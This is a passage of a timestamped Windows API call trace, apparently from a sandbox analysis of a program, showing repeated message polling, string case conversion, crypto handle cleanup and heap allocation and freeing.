lpMsg=0x8bf710) returned 0 [0251.326] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.326] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.327] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.327] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.327] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0251.327] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.327] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0251.327] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.327] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.327] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.327] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0251.327] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.327] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0251.327] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0251.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.327] CryptDestroyKey (hKey=0xaa5820) returned 1 [0251.328] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.328] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.328] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0251.328] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.328] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0251.328] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.328] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.328] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0251.328] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.328] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0251.328] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.328] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.328] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.328] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.329] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.329] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0251.330] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.330] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0251.330] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0251.330] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.330] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.330] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.330] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.330] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.330] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0251.330] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.330] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0251.330] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.330] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.330] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0251.330] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.331] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0251.331] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.331] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.331] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.331] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.331] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.331] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.331] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.331] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.331] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.331] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.331] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.331] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.331] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.331] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.331] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.332] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0251.332] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.332] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0251.332] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.332] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.332] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.332] CryptReleaseContext (hProv=0xad2c70, dwFlags=0x0) returned 1 [0251.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0251.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0251.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0251.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0251.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0251.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0251.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0251.335] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0251.335] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0251.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0251.335] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0251.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0251.336] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0251.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0251.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0251.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.336] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0251.336] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0251.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0251.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.337] FreeLibrary (hLibModule=0x74d40000) returned 1 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.337] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.337] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.337] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0251.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0251.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0251.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0251.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.338] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0251.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0251.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0251.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 